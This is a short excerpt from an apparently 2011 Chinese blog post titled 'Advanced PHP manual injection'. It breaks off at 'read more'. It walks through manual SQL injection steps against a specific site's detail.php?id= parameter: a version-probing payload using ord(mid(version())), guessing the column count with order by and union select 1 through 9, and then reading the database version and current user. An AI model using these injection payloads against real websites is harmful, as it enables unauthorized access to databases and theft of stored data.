高级PHP手工注入
摘要:
1.判断版本http://www.7747.net/document/advisory/detail.php?id=7and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解http://www.7747.net/document/advisory/detail.php?id=7and 2=4 union select 1,2,3,4,5,6,7,8,9--3.查看数据库版本及当前用户,http://www.7747.net/document 阅读全文
posted @ 2011-05-09 01:05 =_=! 阅读(466) 评论(0) 推荐(0) 编辑